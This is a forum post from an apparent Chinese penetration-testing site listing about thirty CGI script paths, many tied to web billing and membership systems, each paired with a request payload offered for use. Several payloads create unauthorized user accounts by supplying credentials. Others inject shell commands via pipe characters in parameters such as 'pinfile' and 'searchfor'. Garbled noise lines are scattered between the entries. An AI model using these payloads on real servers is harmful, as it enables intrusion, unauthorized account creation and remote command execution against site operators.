中国网络渗透测试联盟
标题:
Cgi-bin 30个漏洞+使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:55
标题:
Cgi-bin 30个漏洞+使用方法
==============================
7 L& N/ v7 N1 u g0 t
5 @( t+ J* h! N
/smspass.pl
' M0 F; d( k+ x- B- _9 `1 A
username=username&password=password
! A8 A$ w! ]; ]) i
) r% q3 S5 t% [2 A# t/ W V
/index.cgi
" r/ H0 {6 q0 k# P/ |6 g# |( H
wei=ren&gen=command
" L& V% p$ \- k k; E r( U/ C! I
4 G" R) ?3 u. o) Z, ]8 e& j9 _
/passmaster.cgi
! ?; E3 o( o; W: z+ q: [
Action=Add&Username=Username&Password=Password
) @( w( Z4 Z$ q+ p V5 U. o4 c
& ~ t& p: `2 c( X! l2 i. L) N
/accountcreate.cgi
# ~' ^! v; Y. H5 n8 o
username=username&password=password&ref1=|echo;ls|
G: Y0 I3 J$ I
3 N+ u' O2 U' i9 `1 c
/form.cgi
! M; H& S7 m' y! J% A9 m6 l
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
9 T$ c; o8 r2 [6 x4 a9 D" n0 a! W8 u
# M' Q+ h3 p* P# q( C
/addusr.pl
8 i/ H0 R: g- [6 `- z: s
/cgi-bin/EuroDebit/addusr.pl
5 w. _9 ? ]& @6 Q
user=username&pass=Password&confirm=Password
- ^3 [/ J4 H' m8 K% q
. |3 e# F! d* w5 {6 F' D0 a
/ccbill-local.asp
, J" L3 ^$ r! r' q! l. T
post_values=username:password
* ?4 |$ ]( B( ^% K' ~. ~
# u* @: d1 L9 ^% n* S
/count.cgi
6 B, M$ L$ F# b" q. G4 [+ b! m5 ^
pinfile=|echo;ls -la;exit|
7 |' U: v3 S' w
1 `% D0 s h8 {$ c6 g
/recon.cgi
8 @8 g! _) c6 |; a( t9 X
/recon.cgi?search
2 L+ T( q' a) p3 H7 V: f# _9 P
searchoption=1&searchfor=|echo;ls -al;exit|
& h2 W- l; V+ ~% I F7 d* r: k4 m
6 N) W1 B% h0 B. [
/verotelrum.pl
/ C7 W! }) R3 \
vercode=username:password:dseegsow:add:amount<&30>
- S( K" b) m W& N# _: f
* J% s3 {+ ` ]) B+ O; j+ s$ x
/af.cgi
3 e3 z# \" H; |
_browser_out=|echo;ls -la;exit;|
% o9 c, V# a( @6 @
1 d: {2 d8 j+ `" y' w- I; v
/modify.cgi
- e3 e8 {9 J+ k3 T1 l
username=username&password=password&expire=30
o: E7 J# v3 o" e, j
0 }6 g+ s2 Q+ n9 J1 @/ l$ S
/openjournal.cgi
. e' A! C5 H3 t9 {( v4 l9 O" P
edit=1&ct=2&go=|echo;ls -al;exit|
: g) m ?$ }8 j0 S7 g' @# t5 @1 t
w6 b$ C7 z* q7 M! s
/gx9passwd.cgi
: m: L. x: b/ x4 ]% U
cmd=ADD&user=username&pass=password
1 G7 {" N3 a+ c' v( ^+ Q; _4 k
6 j( W2 {4 t3 w, c6 u" k' [
/probecontrol.cgi
# d( f& O1 |) h2 D7 N$ W( |
command=enable&username=username&password=password
% U! D4 {- j3 p! _" c
+ C8 H; y: S; ?+ B+ Q$ ]- b
/recon.cgi
. o/ F6 _% Q6 \+ P2 S1 ]# B5 L
searchoption=3&searchfor=echo;ls -la;exit
7 f1 F( R1 c7 X( M8 i
0 e% d# O5 i- ?2 m
/htadd.pl
( \, I" \8 [3 k6 _ m4 _( ^9 C
configfile=|echo; ls -alt; exit
! f1 I# `( V3 o+ e" }. F
2 H! r& N# H- ^$ g+ D4 D6 X, W
/gx9passwd.cgi
+ Q9 E+ O$ s8 q- p
cmd=ADD&user=username&pass=password
( a; H/ X2 @# x0 c- n
) v% Y; y0 I( C4 f! K& l
/ibill*.pl
0 u4 W h/ d$ p/ M0 o I ~
reqtype=add&authpwd=authpwd&username=username&password=password
: k/ k0 p, p+ F, P. d
( X/ R+ T$ |0 |0 ~9 a: R, u0 e
/cpay.cgi
3 d1 c$ I. r& i2 b6 K: P* ~+ z7 R
command=add_member&username=username(EMAIL)&password=password(DES)
. A* r* ]2 L+ h/ _, n, e4 e6 U& Q
% @% a* @4 T; a- g7 O" \
/globill_ut.cgi
2 t$ c" M' M7 c' ?1 s! B
do=add&username=username&password=password&wpassword=password
( c* {1 O! E: _4 l4 Z9 P8 J/ b
' _) T1 w. h# w# X4 n3 T$ N
/usercontrol.cgi
' h9 M+ U3 N4 F' V2 F
command=enable&username=USER&password=PASS
2 L! P/ l/ I& P; { ^
& K! L9 X& W( W
/globoSALErum.cgi
7 Y, R4 k/ b2 e
action=ADD&seccode=seccode&login=username&password=password
* G' I' N# g! z h
& ?5 y9 y4 N G) g( J
/addusr.pl
' F( O) H1 p' w& n
user=USER&pass=PASS&confirm=PASS
. r8 r; ]! N3 \5 F* Q9 t4 C
M' @) O; _" I3 R5 ?' H. G9 ?7 N
/pincount.cgi
6 R8 n, u M) K' J
/cgi-bin/mastergate/pincount.cgi
( l/ G$ H5 v: Y9 @' {8 G' w0 S& F) P
pinfile=|echo;pwd;exit|
+ F7 c5 r: ~, k* a, r5 q; D3 J% h6 e
Y4 ~+ Q+ t2 |2 \6 \( G5 e
/accountcreate.cgi
2 a) |, A2 @+ v
/cgi-bin/gateway/accountcreate.cgi
( V$ N1 [' n# c* I3 u+ p. m* Q
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
( M: I3 o. _! B d
9 g5 F# s s* h0 y. \ _
/af.cgi
@) d) C" p! k
/env.cgi
6 s4 Q9 b; p+ s
ADD+;echo;pwd;exit
7 J5 u+ A( x& e7 \0 P
5 g5 q$ {3 d# K& b6 @* l/ k- _
/count.cgi
& q% z; A( w4 T, o
pinfile=|echo;pwd;exit|
4 {; c [! M: x' e4 X. |* a6 Z
) G8 o2 e9 P2 l* O; f& Y# F4 z
/recon.cgi
8 g! @8 F# u; l; R, T% i8 K
searchoption=1&searchfor=|echo;ls%20-al;exit|
' O* w9 _- S. k7 B1 R, o- A
/ e- e& }- r, p2 h
/add.cgi
/ a1 @# z& [5 m1 K" K1 R
username=username&password=password&expire=30
; C/ g5 ?5 c; _8 v# {7 z: D
2 B; S" m# W& i- N
==============================
: e$ K* M* j8 U9 V! r& x
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2